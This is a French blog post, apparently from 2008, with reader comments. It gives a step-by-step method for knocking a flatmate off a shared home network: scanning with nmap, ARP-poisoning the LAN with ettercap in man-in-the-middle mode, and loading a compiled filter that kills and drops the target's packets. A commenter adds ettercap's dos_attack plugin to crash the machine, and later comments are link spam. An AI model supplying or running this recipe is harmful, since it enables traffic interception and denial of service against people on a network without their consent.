HowTo exploser le p2p de son colloc?

Qui n'es jamais aller rebooter le routeur de rage à cause du petit frère qui télécharge à toute vitesse des ~~films~~ vidéos de vacances sans savoir configurer son client p2p (emule and co...). Et rien à y faire, on a beau expliquer que ca "pourrie" complètement la connexion, les gens s'en foutent éperdument du moment que le dernier hit parade est téléchargé...

La liberté des uns s'arrete où commence celle des autres.

Cette maxime illustre bien l'idéal de liberté où les restrictions sont seulement celles qui portent atteinte à autrui. Pour revenir à moi, car mon blog tourne autour de MOI, je m'emporte sur ces pensées philosophiques car pas moyen de me connecter entre 18h et 23h dans ma colloc franco-indo-polono-anglaise et ce "je-m'en-foutisme" ou le "tout pour ma gueule" m'enervait à un point...
C'est donc en concertation et avec l'approbation du reste de la collocation, qu'au nom de tous, j'ai pris les armes et que je suis parti à la reconquête pour défendre nos libertés numériques les plus fondamentales (ndlr : le droit de se connecter)...

Je vous livre, donc à vous, petites gens fort sympatiques (ndlr : forcément sympatique si vous me lisez) les clés pour botter les fesses de votre colloc/frère/soeur/voisin de votre réseau local quand vous n'avez pas accés au routeur.

Lisez la suite de ce billet pour découvrir la démarche.

Conditions : L'astuce n'est valide qu'avec IPv4.

Requis :

GNU/Linux
ettercap

Optionnel :

nmap
Smb4k

Connaître l'IP de votre voisin :
Si vous connaissez déjà l'IP de votre cyber-tyran de colloc, passez à la suite. Sinon vous pouvez utiliser différents logiciels et il en existe une quantité de moyen pour arriver à cette fin.

En voici deux exemples rapides :

- Smb4k :
Avec le logiciel smb4k, on peut voir facilement et rapidement une cartographie du réseaux netbios (partage de fichier windows) afin de repérer le nom et donc l'ip votre voisin. Cet outil est graphique mais il existe l'equivalent en une ligne de commande.

- Nmap :
Un outil que j'adore et que j'utilise énormément (mais très mal) et qui se nomme Nmap. Ce logiciel est un scanneur de ports multifonction, véritable couteau suisse des bricoleurs virtuels.
Voici la commande pour pingé un range d'ip. Notons que le range sera rapide à scanner car de catégorie C (réseaux de particuliers).

Connaître votre Range : route

Pingé ce range : nmap -sP RANGE/24
A noter que le range sera sur 24 bits pour un réseau C.

Principe
Je vous invite à consulter la documentation pour comprendre comment ca marche via les liens que je met en annexes du billet.
Le principe de cette astuce consiste à positionner entre le fauteur de trouble et le routeur puis de "jeter" tous ce qui passe devant votre nez. Pour se faire, nous allons utiliser le logiciel ettercap que nous allons lancer avec un petit script qui se chargera de "jeter" les paquets provenant/allant vers le pc de votre méchant colloc.

Le script
Creez un fichier et ouvrez le avec un editeur de texte (vim/emacs/gedit/kedit anything else...) et copier coller sans scrupule ces quelques lignes en replacant "[@IP_DU_MECHANT_COLLOC]" par l'adresse ip de votre colloc :

if (ip.src == '[@IP_DU_MECHANT_COLLOC]') {
    kill();
    drop();
    msg("Try from IP\n");
}

Sauvegardez le fichier puis ensuite, lancez la compilation du script qui en fait est donc du code :
etterfilter [MONFICHIER] -o [MONBINAIRE]

Il ne vous reste plus qu'a lancer ettercap avec en parametres votre script :
ettercap -i [INTERFACE_RESEAU_ETH] [OPTIONS] [CIBLE] [SOURCE] -F [MONBINAIRE]

Exemple :
ettercap -i eth2 -Tq -M arp // // -F kill.ef

Je vous invite à consulter le man si vous voulez en savoir plus sur le programme ettercap mais pour résumer ce que fais l'exemple :
-i eth2 : lance sur l'interface eth2
-Tq : lance ettercap en mode texte
-M : Mode ManInTheMiddle (cf liens annexes)
arp : utilisation du protocole ARP (cf liens annexes)
// // : de tous le monde pour tous le monde, pas forcément necessaire de "ARPpoisonné" tout le monde pour seulement un PC...
-F kill.ef : lance notre script kill.ef

Conclusion ;
Et voilà ! Vous avez tout en main pour vous reprendre la main sur une connexion digne de ce nom. Je réponds à vos questions vos volontiers. Bonne chance !

Liens annexes :
- IronGeek : Toutes les choses possibles avec ettercap
- Wikipedia : attaque de l'homme du milieu (ManInTheMiddle)
- Wikipedia : ettercap
- Wikipedia : Arp poisoning

8 réactions

1 De Ubutux - 30/10/2008, 14:55

Salut!

Sympa ton explication!

Mais tu peux aussi utiliser simplement le plugin dos_attack qui fera aussi planter la machine.

En tous cas merci pour l'astuce!
2 De Fof - 30/10/2008, 22:40

DOS : Denial Of Service. C'est different de la procédure que je décrit dans ce post.

Derriere ce post humouristique se cache quelques petites notions de réseaux et c'est surtout ca qu' il me semblait intéressant de montrer plus qu'une vulgaire procédure à coup de clicks toute opaque à la compréhension des lecteurs...
3 De David - 11/11/2008, 19:44

Vaut mieux faire ça sur ses colocs qu'on n'aime pas xD
4 De Wiki - 29/04/2009, 13:41

elles sont cool ces imagew fof vous vous etes ien debrouille!
5 De Fof - 29/04/2009, 14:07

Les images ne sont pas mes créations... Je les ai trouvées avec une simple recherche google.
6 De pop - 12/05/2010, 23:51

slt,
possible de faire un filtre moins restrictifs sur les ports qui laisse passer le http, msn et autre?
7 De LYP - 19/10/2012, 05:14

LYP-<a href="http://www.tiffanyoutlet-c.com/">Tiffany And Co</a> was set up in 1837 a U.S. jewelry and silverware company. 1853 Charles Tiffany master control of the company and simplified company name to Tiffany & Co..the company has since established the jewelry industry for business.<a href="http://www.tiffanyoutlet-c.com/">Tiffany Outlet</a> gradually establish branches in all major cities around the world.<a href="http://www.tiffanyoutlet-c.com/tiff...">Tiffany Outlet Store</a> has developed its own set of precious stones, platinum standards,and was adopted by the Government of the United States as an official standard.Today,<a href="http://www.tiffanyoutlet-c.com/tiff...">Tiffany Outlet Online</a> is one of the world's famous luxury goods company.<a href="http://www.tiffanyoutlet-c.com/tiff...">Cheap Tiffany And Co</a> Blue Box more succinct fashion unique style logo. 
<a href="http://www.tiffanyoutlet-b.com/tiff...">Tiffany & Co Outlet</a>,Queen's jewelry industry,with diamonds and silver products known to the world.<a href="http://www.tiffanyoutlet-b.com/">Tiffany And Co Outlet</a> was founded in 1837,the beginning of the silver cutlery famous,and in 1851 launched a 925 silver ornaments and more famous.1960 Hollywood actress Audrey Hepburn starred in the "Tiffany Breakfast"is <a href="http://www.tiffanyoutlet-b.com/">Tiffany Outlet</a> named.<a href="http://www.tiffanyoutlet-b.com/tiff...">Tiffany Jewelry Outlet</a>,a symbol of American design.Of love and beauty, romance and dreams as the theme,but the wind reputation for nearly two centuries.<a href="http://www.tiffanyoutlet-b.com/tiff...">Tiffany Rings</a> is full of sensual beauty and soft,delicate sensibility to meet the fantasies and desires of all women in the world. 
In the world of high heels,<a href="http://www.christianlouboutinsale4m...">christian louboutin</a> is absolutely can not be ignored.<a href="http://www.christianlouboutinsale4m...">christian louboutin sale</a> is the favorite of European and American actress!Red-soled shoes are <a href="http://www.christianlouboutinsale4m...">christian louboutin shoes</a> signs marking,highlighting women's lovely,beautiful and not play mature sexy.Whether you what kind of woman,all need to put on a pair of <a href="http://www.christianlouboutinsale4m...">christian louboutin boots</a> to set foot on the red carpet,we are unable to intervene As for your choice,but you should know that the <a href="http://www.christianlouboutinsale4m...">christian louboutin sales</a> name. 
The Max Azria's <a href="http://www.hervelegerdress-e.com/">herve leger</a> from France,the brand established in 1985,is a famous fashion design house in Paris.<a href="http://www.hervelegerdress-e.com/">herve leger dress</a> is committed to shaping the women's physical beauty,showing femininity another line feeling the silhouette.<a href="http://www.hervelegerdress-e.com/he...">herve leger dresses</a> every cut close to the body, carving out the perfect female body shape,and thus the image to get the name of "<a href="http://www.hervelegerdress-e.com/he...">herve leger bandage dresses</a>".In addition to the ladies,<a href="http://www.hervelegerdress-e.com/he...">herve leger sale</a> famous perfume,<a href="http://www.hervelegerdress-e.com/ro...">herve leger shop</a> and shopping malls of the world designated sales.
8 De Rozita Che Wan Kesunyian di dapur MasterChef Selebriti Malaysia 2 - 14/06/2013, 16:43

I've been exploring for a little bit for any high-quality articles or weblog posts on this sort of area . Exploring in Yahoo I eventually stumbled upon this web site. Reading this info So i'm happy to express that I've an incredibly excellent uncanny feeling I came upon just what I needed. I so much unquestionably will make certain to do not overlook this website and provides it a glance regularly.

DéBlogToi

HowTo exploser le p2p de son colloc?

8 réactions

Ajouter un commentaire

Catégories

Derniers commentaires

Liens

Amis

Autres

Famille

Tags